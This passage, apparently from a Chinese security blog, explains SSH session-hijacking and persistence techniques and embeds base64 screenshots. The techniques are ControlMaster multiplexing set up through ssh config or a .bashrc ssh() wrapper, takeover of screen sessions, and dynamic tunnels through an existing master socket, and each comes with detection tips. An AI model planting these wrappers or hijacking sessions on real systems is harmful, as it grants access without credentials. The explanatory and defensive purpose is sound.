ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/
aaarticlea/png;base64,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" alt="" />
开启了ControlMaster模式之后,如果当前用户已经成功登录过一次目标机器(例如远程跳板机、DMZ机器),则黑客可以利用Multiplexing技术直接"无密码"登录同样的那台服务器。
简单来说,SSH的密码验证是基于TCP Connection级别的,而不是会话Session界别的,当发生Multiplexing的时候,黑客的Session可以直接绕过任何的登录验证。
aaarticlea/png;base64,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" alt="" />
2. 修改ssh配置【攻击者没有root权限】
vim $HOME/.ssh/config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/
3. 修改ssh配置【在.bashrc里封装ssh命令】
vim $HOMW/.bashrc
/*
..
ssh ()
{
/usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";
}
..
*/
利用了Linux Bash的自定义函数的方式、SSH动态配置参数的特性实现了开启ControlMaster模式。
0x3:攻击者复用Multiplexing模式下的Socket会话进行SSH连接
aaarticlea/png;base64,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" alt="" />
This socket can be used to create further sessions, without credentials, even after the original user exits their session.
0x4:对抗检测方法
- 检查ssh的配置文件中,是否开启了ControlMaster模式
- /etc/ssh/ssh_config
- $HOME/.ssh/config
- 检查bash自定义函数中是否有ssh()劫持
- set | grep "ssh()"
Relevant Link:
https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing
http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing
http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/
http://www.revsys.com/writings/quicktips/ssh-faster-connections.html
6. Hijacking Active SSH Screen Sessions
ssh_user用户使用screen管理ssh会话时的情景
当ssh_user使用
screen ssh root@112.124.20.20
连接远程的"112.124.20.20"时,会在/var/run/screen有显示相应的文件。
ls -la /var/run/screen/
可以用screen -r root/来接管会话
注入screen的ssh会话,会有一个不好的地方,就是你敲的命令,会在当前正在连接的用户那里同时显示,容易被发现
0x1:对抗检测方法
- 检测/var/run/screen/是否包含screen会话,这从某种程度上算是一种可疑事件
Relevant Link:
http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html
http://drops.wooyun.org/tips/5253
7. dynamic tunnel in existing SSH session
we can create a dynamic tunnel inside an existing master socket
lsof -i TCP:9090
ssh -O forward -D 9090 -S /tmp/root@112.124.20.20\:22 %h
lsof -i TCP:9090
aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAhcAAAA2CAIAAAD71CylAAAME0lEQVR4nO2da5LrKAyFvS4vyFWzG6+GzbCYzA8HEOgIBHEn6dvnq6mpvgTzNBIII7b//vtv+1sc4ZEIx6cLQ8i3c0YOF9Ll72kRQggh90EtQgghZB1qEUIIIetQixBCCFmHWoQQQsg6b9Ai6RsPfuJBCCH/HD+tRfYzXuoj/9H+kBBf4EqNk4PjuevIMvAKW9FVZ3w84jn/3ACjRnNJxHM/4+DhlNELenrP33PWDT3x+CB3kUOTj+jiM8Rzb1puWC04TYFt4o9JCPFypxZB4u6MSViMhOERnjH38sxWhNMRsqA/QhryR8hj/4o5FLidzFeeGyaqajTF1WbOSq3WvWT0o6Qsnk2dGqd05qVnSpOlAolOxsk+HxHxilLLfTATkxAygdAi15wsnsc1Y5PjTE1SdWA9fRTCPRw5upAL5uxvPyMW6EjQKwEjhGFZrlQ5plrKGuc5vyhWdTjxjA8p3x4i5bY99FRe1eiK7JHaL2mRUqYQY683q0XCvDadnMvX/WjJ7r3qSakJmpxkAvmZ5uHZmISQCZq1yBGSfDmybUEsJsoSQAdaa5FwXGJU/QqFozVrb59u9JKRpvxn/ltKEzkjTgI01S5V7YyPeO7lsePIU2e51igFq4WRrpFTizQWIEf8xlAjFXy34+5Yi7gTqIS1ma/4QcbRTVetMFLtYL/7YxJCJlBapBZ59b+f4xkGbl0tEg6PFrEsP/sZ8Ry5txapyy/LnEuyC80iE7oip1+FJWbfavu+Dmmm+U5blhCOVUmOEM/dO0fWdW81kNVxTi3S1rOq2f1axLs8KtsqMfZ1gz8mIcTNO7SIudWpLDBIXlwTR6v8ncVHevpaTzTRpJrYJrSInMJDFeWoEapiOFIjDUyENqYQzMV4UYus5d4yb9GaL8PQTkWLFiG3MdAi9dBKQw4GSqFZbCiduTiU7M1PZ9TyU5hlxJY7TPMqVAhKVB3h+h5IpFmm1s+SWFpE7OeLcgysc7Jg/n2RI6SVnIM6Xr2DnPsFdtwHtUjdSqXQRoE6TSeXffsZsuEuqPfPH5MQMqZokb3ZZN11cD9wQ5/lyi99jVm22Jlopt6tCcW9Rfww5KlA6IDnl751omVl8PwO+AhXutIs8hDGIpW7uZjwa5FiD+wxbs9mX6Fuu/rx6fk4zH0ctW2OKtT0uwz3RUDJ0Rvij0kImeDPnjr8FUbwM4aDX6ASQr6Zv+cBhfeLEELIffw9LUIIIeQ+qEUIIYSsQy1CCC